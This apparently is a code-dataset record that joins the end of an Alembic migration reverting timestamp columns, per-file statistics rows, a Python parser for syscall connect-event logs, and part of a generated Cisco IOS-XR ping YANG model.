existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=False)
op.alter_column('tools', 'updated',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=False)
op.alter_column('tools', 'deleted',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=True)
op.alter_column('tools', 'created',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=False)
op.alter_column('test_cases', 'updated',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=False)
op.alter_column('test_cases', 'deleted',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=True)
op.alter_column('test_cases', 'created',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=False)
op.alter_column('steps', 'updated',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=False)
op.alter_column('steps', 'deleted',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=True)
op.alter_column('steps', 'created',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=False)
op.alter_column('stages', 'updated',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=False)
op.alter_column('stages', 'deleted',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=True)
op.alter_column('stages', 'created',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=False)
op.alter_column('secrets', 'updated',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=False)
op.alter_column('secrets', 'deleted',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=True)
op.alter_column('secrets', 'created',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=False)
op.alter_column('runs', 'updated',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=False)
op.alter_column('runs', 'started',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=True)
op.alter_column('runs', 'soft_timeout_reached',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=True)
op.alter_column('runs', 'hard_timeout_reached',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=True)
op.alter_column('runs', 'finished_again',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=True)
op.alter_column('runs', 'finished',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=True)
op.alter_column('runs', 'email_sent',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=True)
op.alter_column('runs', 'deleted',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=True)
op.alter_column('runs', 'created',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=False)
op.alter_column('repo_changes', 'updated',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=False)
op.alter_column('repo_changes', 'deleted',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=True)
op.alter_column('repo_changes', 'created',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=False)
op.alter_column('projects', 'updated',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=False)
op.alter_column('projects', 'deleted',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=True)
op.alter_column('projects', 'created',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=False)
op.alter_column('jobs', 'updated',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=False)
op.alter_column('jobs', 'started',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=True)
op.alter_column('jobs', 'processing_started',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=True)
op.alter_column('jobs', 'finished',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=True)
op.alter_column('jobs', 'deleted',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=True)
op.alter_column('jobs', 'created',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=False)
op.alter_column('jobs', 'completed',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=True)
op.alter_column('jobs', 'assigned',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=True)
op.alter_column('flows', 'updated',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=False)
op.alter_column('flows', 'finished',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=True)
op.alter_column('flows', 'deleted',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=True)
op.alter_column('flows', 'created',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=False)
op.alter_column('branches', 'updated',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=False)
op.alter_column('branches', 'deleted',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=True)
op.alter_column('branches', 'created',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=False)
op.alter_column('agents_groups', 'updated',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=False)
op.alter_column('agents_groups', 'deleted',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=True)
op.alter_column('agents_groups', 'created',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=False)
op.alter_column('agents', 'updated',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=False)
op.alter_column('agents', 'last_seen',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=True)
op.alter_column('agents', 'deleted',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=True)
op.alter_column('agents', 'created',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=False)
# ### end Alembic commands ###
| 44.729124
| 65
| 0.596121
| 2,084
| 21,962
| 6.038868
| 0.043186
| 0.064521
| 0.119825
| 0.202781
| 0.975606
| 0.975606
| 0.972745
| 0.96178
| 0.95447
| 0.95447
| 0
| 0.003207
| 0.290046
| 21,962
| 490
| 66
| 44.820408
| 0.803938
| 0.01448
| 0
| 0.980973
| 0
| 0
| 0.079696
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004228
| false
| 0
| 0.006342
| 0
| 0.010571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d2e159519bcfba6a22741e083054d4da7cb36577
| 3,450
|
py
|
Python
|
parsers/milliscope_parser.py
|
jazevedo620/wise-kubernetes
|
a39daa1bb4b742c974a43f3d5e44f6036d1d16ad
|
[
"Apache-2.0"
] | 1
|
2020-03-13T06:10:18.000Z
|
2020-03-13T06:10:18.000Z
|
parsers/milliscope_parser.py
|
elba-kubernetes/experiment
|
a39daa1bb4b742c974a43f3d5e44f6036d1d16ad
|
[
"Apache-2.0"
] | 1
|
2020-09-18T20:14:38.000Z
|
2020-09-18T20:14:38.000Z
|
parsers/milliscope_parser.py
|
elba-kubernetes/experiment
|
a39daa1bb4b742c974a43f3d5e44f6036d1d16ad
|
[
"Apache-2.0"
] | null | null | null |
import csv
import numpy
import sys
from collections import OrderedDict
class LogEntryConnect:
"""A TCP/IP event log entry."""
def __init__(self, event, ret, ts, pid, tid, sock_fd, port):
"""Initialize a LogEntry.
event -- [str] Name of the invoked syscall: 'connect', 'sendto', or 'recvfrom'.
ts -- [int] Timestamp generated when the syscall was invoked.
sock_fd -- [int] File descriptor of the socket used by the syscall.
"""
self._event = event
self._ret = ret
self._ts = ts
self._pid = pid
self._tid = tid
self._sock_fd = sock_fd
self._port = port
def __lt__(self, other):
"""Less than comparison operator.
other -- [LogEntry] Another LogEntry being compared against this.
"""
return self._ts < other._ts
def event(self):
"""Return the name."""
return self._event
def ret(self):
return self._ret
def ts(self):
"""Return the timestamp."""
return self._ts
def pid(self):
return self._pid
def tid(self):
return self._tid
def sock_fd(self):
"""Return the socket file descriptor."""
return self._sock_fd
def port(self):
return self._port
class LogEntry:
"""A TCP/IP event log entry."""
def __init__(self, event, ret, ts, pid, tid, sock_fd):
"""Initialize a LogEntry.
event -- [str] Name of the invoked syscall: 'connect', 'sendto', or 'recvfrom'.
ts -- [int] Timestamp generated when the syscall was invoked.
sock_fd -- [int] File descriptor of the socket used by the syscall.
"""
self._event = event
self._ret = ret
self._ts = ts
self._pid = pid
self._tid = tid
self._sock_fd = sock_fd
def __lt__(self, other):
"""Less than comparison operator.
other -- [LogEntry] Another LogEntry being compared against this.
"""
return self._ts < other._ts
def event(self):
"""Return the name."""
return self._event
def ret(self):
return self._ret
def ts(self):
"""Return the timestamp."""
return self._ts
def pid(self):
return self._pid
def tid(self):
return self._tid
def sock_fd(self):
"""Return the socket file descriptor."""
return self._sock_fd
# def __repr__(self):
# """Return a string representation."""
# return "[{event} -- TS: {ts}; SOCK_FD: {sock_fd}]".format(
# event=self._event, ts=str(self._ts), sock_fd=str(self._sock_fd))
def spec_connect(iterator):
log_entries = OrderedDict()
connect_reader = csv.DictReader(iterator)
val = 0
for connect_row in connect_reader:
log_entries[val] = LogEntryConnect('connect', int(connect_row['RET']), int(connect_row['TS']), int(connect_row['PID']), int(connect_row['TID']), int(connect_row['SOCK_FD']), int(connect_row['PORT']))
val = val + 1
return log_entries
def main(iterator):
log_entries = OrderedDict()
connect_reader = csv.DictReader(iterator)
val = 0
for connect_row in connect_reader:
log_entries[val] = LogEntry('connect', int(connect_row['RET']), int(connect_row['TS']), int(connect_row['PID']), int(connect_row['TID']), int(connect_row['SOCK_FD']))
val = val + 1
return log_entries
| 27.6
| 207
| 0.597101
| 442
| 3,450
| 4.445701
| 0.169683
| 0.054962
| 0.072774
| 0.018321
| 0.844784
| 0.844784
| 0.821374
| 0.821374
| 0.821374
| 0.821374
| 0
| 0.001613
| 0.281159
| 3,450
| 125
| 208
| 27.6
| 0.790726
| 0.307826
| 0
| 0.776119
| 0
| 0
| 0.02427
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.283582
| false
| 0
| 0.059701
| 0.104478
| 0.626866
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 10
|
9621d312f0f0599663a55ebe605be8beb25bf079
| 48,261
|
py
|
Python
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ping_act.py
|
bopopescu/ACI
|
dd717bc74739eeed4747b3ea9e36b239580df5e1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ping_act.py
|
bopopescu/ACI
|
dd717bc74739eeed4747b3ea9e36b239580df5e1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_ping_act.py
|
bopopescu/ACI
|
dd717bc74739eeed4747b3ea9e36b239580df5e1
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2020-07-22T04:04:44.000Z
|
2020-07-22T04:04:44.000Z
|
""" Cisco_IOS_XR_ping_act
This module contains a collection of YANG definitions
for Cisco IOS\-XR ping action package configuration.
Copyright (c) 2016 by Cisco Systems, Inc.
All rights reserved.
"""
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class Ping(Entity):
"""
Send echo messages
.. attribute:: input
**type**\: :py:class:`Input <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ping_act.Ping.Input>`
.. attribute:: output
**type**\: :py:class:`Output <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ping_act.Ping.Output>`
"""
_prefix = 'ping-act'
_revision = '2016-09-28'
def __init__(self):
super(Ping, self).__init__()
self._top_entity = None
self.yang_name = "ping"
self.yang_parent_name = "Cisco-IOS-XR-ping-act"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict()
self.input = Ping.Input()
self.input.parent = self
self._children_name_map["input"] = "input"
self._children_yang_names.add("input")
self.output = Ping.Output()
self.output.parent = self
self._children_name_map["output"] = "output"
self._children_yang_names.add("output")
self._segment_path = lambda: "Cisco-IOS-XR-ping-act:ping"
class Input(Entity):
"""
.. attribute:: destination
**type**\: :py:class:`Destination <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ping_act.Ping.Input.Destination>`
.. attribute:: ipv4
**type**\: list of :py:class:`Ipv4 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ping_act.Ping.Input.Ipv4>`
.. attribute:: ipv6
**type**\: :py:class:`Ipv6 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ping_act.Ping.Input.Ipv6>`
"""
_prefix = 'ping-act'
_revision = '2016-09-28'
def __init__(self):
super(Ping.Input, self).__init__()
self.yang_name = "input"
self.yang_parent_name = "ping"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("destination", ("destination", Ping.Input.Destination)), ("ipv6", ("ipv6", Ping.Input.Ipv6))])
self._child_list_classes = OrderedDict([("ipv4", ("ipv4", Ping.Input.Ipv4))])
self._leafs = OrderedDict()
self.destination = Ping.Input.Destination()
self.destination.parent = self
self._children_name_map["destination"] = "destination"
self._children_yang_names.add("destination")
self.ipv6 = Ping.Input.Ipv6()
self.ipv6.parent = self
self._children_name_map["ipv6"] = "ipv6"
self._children_yang_names.add("ipv6")
self.ipv4 = YList(self)
self._segment_path = lambda: "input"
self._absolute_path = lambda: "Cisco-IOS-XR-ping-act:ping/%s" % self._segment_path()
def __setattr__(self, name, value):
self._perform_setattr(Ping.Input, [], name, value)
class Destination(Entity):
"""
.. attribute:: destination
Ping destination address or hostname
**type**\: str
**mandatory**\: True
.. attribute:: repeat_count
Number of ping packets to be sent out
**type**\: int
**range:** 1..64
**default value**\: 5
.. attribute:: data_size
Size of ping packet
**type**\: int
**range:** 36..18024
**default value**\: 100
.. attribute:: timeout
Timeout in seconds
**type**\: int
**range:** 0..36
**default value**\: 2
.. attribute:: interval
Ping interval in milli seconds
**type**\: int
**range:** 0..3600
**default value**\: 10
.. attribute:: pattern
Pattern of payload data
**type**\: str
**pattern:** [0\-9a\-fA\-F]{1,8}
.. attribute:: sweep
Sweep is enabled
**type**\: bool
.. attribute:: vrf_name
VRF name
**type**\: str
.. attribute:: source
Source address or interface
**type**\: str
.. attribute:: verbose
Validate return packet
**type**\: bool
.. attribute:: type_of_service
Type of Service
**type**\: int
**range:** 0..255
.. attribute:: do_not_frag
Do Not Fragment
**type**\: bool
.. attribute:: validate
Validate return packet
**type**\: bool
.. attribute:: priority
Priority of the packet
**type**\: int
**range:** 0..15
.. attribute:: outgoing_interface
Outgoing interface, needed in case of ping to link local address
**type**\: str
"""
_prefix = 'ping-act'
_revision = '2016-09-28'
def __init__(self):
super(Ping.Input.Destination, self).__init__()
self.yang_name = "destination"
self.yang_parent_name = "input"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('destination', YLeaf(YType.str, 'destination')),
('repeat_count', YLeaf(YType.uint64, 'repeat-count')),
('data_size', YLeaf(YType.uint64, 'data-size')),
('timeout', YLeaf(YType.uint64, 'timeout')),
('interval', YLeaf(YType.uint32, 'interval')),
('pattern', YLeaf(YType.str, 'pattern')),
('sweep', YLeaf(YType.boolean, 'sweep')),
('vrf_name', YLeaf(YType.str, 'vrf-name')),
('source', YLeaf(YType.str, 'source')),
('verbose', YLeaf(YType.boolean, 'verbose')),
('type_of_service', YLeaf(YType.uint8, 'type-of-service')),
('do_not_frag', YLeaf(YType.boolean, 'do-not-frag')),
('validate', YLeaf(YType.boolean, 'validate')),
('priority', YLeaf(YType.uint8, 'priority')),
('outgoing_interface', YLeaf(YType.str, 'outgoing-interface')),
])
self.destination = None
self.repeat_count = None
self.data_size = None
self.timeout = None
self.interval = None
self.pattern = None
self.sweep = None
self.vrf_name = None
self.source = None
self.verbose = None
self.type_of_service = None
self.do_not_frag = None
self.validate = None
self.priority = None
self.outgoing_interface = None
self._segment_path = lambda: "destination"
self._absolute_path = lambda: "Cisco-IOS-XR-ping-act:ping/input/%s" % self._segment_path()
def __setattr__(self, name, value):
self._perform_setattr(Ping.Input.Destination, ['destination', 'repeat_count', 'data_size', 'timeout', 'interval', 'pattern', 'sweep', 'vrf_name', 'source', 'verbose', 'type_of_service', 'do_not_frag', 'validate', 'priority', 'outgoing_interface'], name, value)
class Ipv4(Entity):
"""
.. attribute:: destination (key)
Ping destination address or hostname
**type**\: str
**mandatory**\: True
.. attribute:: repeat_count
Number of ping packets to be sent out
**type**\: int
**range:** 1..64
**default value**\: 5
.. attribute:: data_size
Size of ping packet
**type**\: int
**range:** 36..18024
**default value**\: 100
.. attribute:: timeout
Timeout in seconds
**type**\: int
**range:** 0..36
**default value**\: 2
.. attribute:: interval
Ping interval in milli seconds
**type**\: int
**range:** 0..3600
**default value**\: 10
.. attribute:: pattern
Pattern of payload data
**type**\: str
**pattern:** [0\-9a\-fA\-F]{1,8}
.. attribute:: sweep
Sweep is enabled
**type**\: bool
.. attribute:: vrf_name
VRF name
**type**\: str
.. attribute:: source
Source address or interface
**type**\: str
.. attribute:: verbose
Validate return packet
**type**\: bool
.. attribute:: type_of_service
Type of Service
**type**\: int
**range:** 0..255
.. attribute:: do_not_frag
Do Not Fragment
**type**\: bool
.. attribute:: validate
Validate return packet
**type**\: bool
"""
_prefix = 'ping-act'
_revision = '2016-09-28'
def __init__(self):
super(Ping.Input.Ipv4, self).__init__()
self.yang_name = "ipv4"
self.yang_parent_name = "input"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['destination']
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('destination', YLeaf(YType.str, 'destination')),
('repeat_count', YLeaf(YType.uint64, 'repeat-count')),
('data_size', YLeaf(YType.uint64, 'data-size')),
('timeout', YLeaf(YType.uint64, 'timeout')),
('interval', YLeaf(YType.uint32, 'interval')),
('pattern', YLeaf(YType.str, 'pattern')),
('sweep', YLeaf(YType.boolean, 'sweep')),
('vrf_name', YLeaf(YType.str, 'vrf-name')),
('source', YLeaf(YType.str, 'source')),
('verbose', YLeaf(YType.boolean, 'verbose')),
('type_of_service', YLeaf(YType.uint8, 'type-of-service')),
('do_not_frag', YLeaf(YType.boolean, 'do-not-frag')),
('validate', YLeaf(YType.boolean, 'validate')),
])
self.destination = None
self.repeat_count = None
self.data_size = None
self.timeout = None
self.interval = None
self.pattern = None
self.sweep = None
self.vrf_name = None
self.source = None
self.verbose = None
self.type_of_service = None
self.do_not_frag = None
self.validate = None
self._segment_path = lambda: "ipv4" + "[destination='" + str(self.destination) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-ping-act:ping/input/%s" % self._segment_path()
def __setattr__(self, name, value):
self._perform_setattr(Ping.Input.Ipv4, ['destination', 'repeat_count', 'data_size', 'timeout', 'interval', 'pattern', 'sweep', 'vrf_name', 'source', 'verbose', 'type_of_service', 'do_not_frag', 'validate'], name, value)
class Ipv6(Entity):
"""
.. attribute:: destination
Ping destination address or hostname
**type**\: str
**mandatory**\: True
.. attribute:: repeat_count
Number of ping packets to be sent out
**type**\: int
**range:** 1..64
**default value**\: 5
.. attribute:: data_size
Size of ping packet
**type**\: int
**range:** 36..18024
**default value**\: 100
.. attribute:: timeout
Timeout in seconds
**type**\: int
**range:** 0..36
**default value**\: 2
.. attribute:: interval
Ping interval in milli seconds
**type**\: int
**range:** 0..3600
**default value**\: 10
.. attribute:: pattern
Pattern of payload data
**type**\: str
**pattern:** [0\-9a\-fA\-F]{1,8}
.. attribute:: sweep
Sweep is enabled
**type**\: bool
.. attribute:: vrf_name
VRF name
**type**\: str
.. attribute:: source
Source address or interface
**type**\: str
.. attribute:: verbose
Validate return packet
**type**\: bool
.. attribute:: priority
Priority of the packet
**type**\: int
**range:** 0..15
.. attribute:: outgoing_interface
Outgoing interface, needed in case of ping to link local address
**type**\: str
"""
_prefix = 'ping-act'
_revision = '2016-09-28'
def __init__(self):
super(Ping.Input.Ipv6, self).__init__()
self.yang_name = "ipv6"
self.yang_parent_name = "input"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('destination', YLeaf(YType.str, 'destination')),
('repeat_count', YLeaf(YType.uint64, 'repeat-count')),
('data_size', YLeaf(YType.uint64, 'data-size')),
('timeout', YLeaf(YType.uint64, 'timeout')),
('interval', YLeaf(YType.uint32, 'interval')),
('pattern', YLeaf(YType.str, 'pattern')),
('sweep', YLeaf(YType.boolean, 'sweep')),
('vrf_name', YLeaf(YType.str, 'vrf-name')),
('source', YLeaf(YType.str, 'source')),
('verbose', YLeaf(YType.boolean, 'verbose')),
('priority', YLeaf(YType.uint8, 'priority')),
('outgoing_interface', YLeaf(YType.str, 'outgoing-interface')),
])
self.destination = None
self.repeat_count = None
self.data_size = None
self.timeout = None
self.interval = None
self.pattern = None
self.sweep = None
self.vrf_name = None
self.source = None
self.verbose = None
self.priority = None
self.outgoing_interface = None
self._segment_path = lambda: "ipv6"
self._absolute_path = lambda: "Cisco-IOS-XR-ping-act:ping/input/%s" % self._segment_path()
def __setattr__(self, name, value):
self._perform_setattr(Ping.Input.Ipv6, ['destination', 'repeat_count', 'data_size', 'timeout', 'interval', 'pattern', 'sweep', 'vrf_name', 'source', 'verbose', 'priority', 'outgoing_interface'], name, value)
class Output(Entity):
"""
.. attribute:: ping_response
**type**\: :py:class:`PingResponse <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ping_act.Ping.Output.PingResponse>`
"""
_prefix = 'ping-act'
_revision = '2016-09-28'
def __init__(self):
super(Ping.Output, self).__init__()
self.yang_name = "output"
self.yang_parent_name = "ping"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("ping-response", ("ping_response", Ping.Output.PingResponse))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict()
self.ping_response = Ping.Output.PingResponse()
self.ping_response.parent = self
self._children_name_map["ping_response"] = "ping-response"
self._children_yang_names.add("ping-response")
self._segment_path = lambda: "output"
self._absolute_path = lambda: "Cisco-IOS-XR-ping-act:ping/%s" % self._segment_path()
class PingResponse(Entity):
"""
.. attribute:: ipv4
**type**\: list of :py:class:`Ipv4 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ping_act.Ping.Output.PingResponse.Ipv4>`
.. attribute:: ipv6
**type**\: :py:class:`Ipv6 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ping_act.Ping.Output.PingResponse.Ipv6>`
"""
_prefix = 'ping-act'
_revision = '2016-09-28'
def __init__(self):
super(Ping.Output.PingResponse, self).__init__()
self.yang_name = "ping-response"
self.yang_parent_name = "output"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("ipv6", ("ipv6", Ping.Output.PingResponse.Ipv6))])
self._child_list_classes = OrderedDict([("ipv4", ("ipv4", Ping.Output.PingResponse.Ipv4))])
self._leafs = OrderedDict()
self.ipv6 = Ping.Output.PingResponse.Ipv6()
self.ipv6.parent = self
self._children_name_map["ipv6"] = "ipv6"
self._children_yang_names.add("ipv6")
self.ipv4 = YList(self)
self._segment_path = lambda: "ping-response"
self._absolute_path = lambda: "Cisco-IOS-XR-ping-act:ping/output/%s" % self._segment_path()
def __setattr__(self, name, value):
self._perform_setattr(Ping.Output.PingResponse, [], name, value)
class Ipv4(Entity):
"""
.. attribute:: destination (key)
Ping destination address or hostname
**type**\: str
**mandatory**\: True
.. attribute:: repeat_count
Number of ping packets to be sent out
**type**\: int
**range:** 1..64
**default value**\: 5
.. attribute:: data_size
Size of ping packet
**type**\: int
**range:** 36..18024
**default value**\: 100
.. attribute:: timeout
Timeout in seconds
**type**\: int
**range:** 0..36
**default value**\: 2
.. attribute:: interval
Ping interval in milli seconds
**type**\: int
**range:** 0..3600
**default value**\: 10
.. attribute:: pattern
Pattern of payload data
**type**\: str
**pattern:** [0\-9a\-fA\-F]{1,8}
.. attribute:: sweep
Sweep is enabled
**type**\: bool
.. attribute:: replies
**type**\: :py:class:`Replies <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ping_act.Ping.Output.PingResponse.Ipv4.Replies>`
.. attribute:: hits
Number of packets reach to destination and get reply back
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: total
Total number of packets sent out
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: success_rate
Successful rate of ping
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: rtt_min
Minimum value of Round Trip Time
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: rtt_avg
Average value of Round Trip Time
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: rtt_max
Maximum value of Round Trip Time
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: sweep_min
Minimum value of sweep size
**type**\: int
**range:** 0..4294967295
.. attribute:: sweep_max
Maximum value of sweep size
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: rotate_pattern
Rotate Pattern is enabled
**type**\: bool
.. attribute:: ping_error_response
Error response for each ping, in case of bulk ping
**type**\: str
"""
_prefix = 'ping-act'
_revision = '2016-09-28'
def __init__(self):
super(Ping.Output.PingResponse.Ipv4, self).__init__()
self.yang_name = "ipv4"
self.yang_parent_name = "ping-response"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['destination']
self._child_container_classes = OrderedDict([("replies", ("replies", Ping.Output.PingResponse.Ipv4.Replies))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('destination', YLeaf(YType.str, 'destination')),
('repeat_count', YLeaf(YType.uint64, 'repeat-count')),
('data_size', YLeaf(YType.uint64, 'data-size')),
('timeout', YLeaf(YType.uint64, 'timeout')),
('interval', YLeaf(YType.uint32, 'interval')),
('pattern', YLeaf(YType.str, 'pattern')),
('sweep', YLeaf(YType.boolean, 'sweep')),
('hits', YLeaf(YType.uint64, 'hits')),
('total', YLeaf(YType.uint64, 'total')),
('success_rate', YLeaf(YType.uint64, 'success-rate')),
('rtt_min', YLeaf(YType.uint64, 'rtt-min')),
('rtt_avg', YLeaf(YType.uint64, 'rtt-avg')),
('rtt_max', YLeaf(YType.uint64, 'rtt-max')),
('sweep_min', YLeaf(YType.uint32, 'sweep-min')),
('sweep_max', YLeaf(YType.uint64, 'sweep-max')),
('rotate_pattern', YLeaf(YType.boolean, 'rotate-pattern')),
('ping_error_response', YLeaf(YType.str, 'ping-error-response')),
])
self.destination = None
self.repeat_count = None
self.data_size = None
self.timeout = None
self.interval = None
self.pattern = None
self.sweep = None
self.hits = None
self.total = None
self.success_rate = None
self.rtt_min = None
self.rtt_avg = None
self.rtt_max = None
self.sweep_min = None
self.sweep_max = None
self.rotate_pattern = None
self.ping_error_response = None
self.replies = Ping.Output.PingResponse.Ipv4.Replies()
self.replies.parent = self
self._children_name_map["replies"] = "replies"
self._children_yang_names.add("replies")
self._segment_path = lambda: "ipv4" + "[destination='" + str(self.destination) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-ping-act:ping/output/ping-response/%s" % self._segment_path()
def __setattr__(self, name, value):
self._perform_setattr(Ping.Output.PingResponse.Ipv4, ['destination', 'repeat_count', 'data_size', 'timeout', 'interval', 'pattern', 'sweep', 'hits', 'total', 'success_rate', 'rtt_min', 'rtt_avg', 'rtt_max', 'sweep_min', 'sweep_max', 'rotate_pattern', 'ping_error_response'], name, value)
class Replies(Entity):
"""
.. attribute:: reply
**type**\: list of :py:class:`Reply <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ping_act.Ping.Output.PingResponse.Ipv4.Replies.Reply>`
"""
_prefix = 'ping-act'
